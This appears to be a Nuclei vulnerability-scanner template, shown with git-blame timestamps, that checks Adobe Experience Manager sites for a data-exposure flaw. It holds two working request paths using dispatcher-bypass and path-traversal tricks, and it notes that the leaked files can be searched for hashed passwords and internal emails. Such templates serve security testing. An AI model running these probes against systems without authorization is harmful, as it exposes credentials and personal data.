2023-05-22 08:58:47 +00:00
|
|
|
id: aem-secrets
|
|
|
|
|
|
|
|
info:
|
2023-05-22 09:11:25 +00:00
|
|
|
name: AEM Secrets - Sensitive Information Disclosure
|
2023-05-28 13:49:54 +00:00
|
|
|
author: boobooHQ,j3ssie
|
2023-05-22 08:58:47 +00:00
|
|
|
severity: high
|
2023-05-22 09:11:25 +00:00
|
|
|
reference:
|
|
|
|
- https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/
|
|
|
|
description: |
|
|
|
|
Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc.
|
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-05-22 09:11:25 +00:00
|
|
|
tags: aem,adobe,misconfig,exposure
|
2023-05-22 08:58:47 +00:00
|
|
|
|
2023-06-01 07:51:50 +00:00
|
|
|
http:
|
2023-05-22 08:58:47 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
|
|
|
|
- "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
|
|
|
|
|
|
|
|
headers:
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
|
|
Accept-Language: en-US,en;q=0.9,hi;q=0.8
|
|
|
|
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
2023-05-22 09:11:25 +00:00
|
|
|
words:
|
|
|
|
- '"jcr:uuid"'
|
|
|
|
- '"jcr:createdBy"'
|
|
|
|
- '"uri"'
|
2023-05-22 08:58:47 +00:00
|
|
|
condition: and
|
|
|
|
|
2023-05-22 09:11:25 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- application/json
|
|
|
|
|
2023-05-22 08:58:47 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|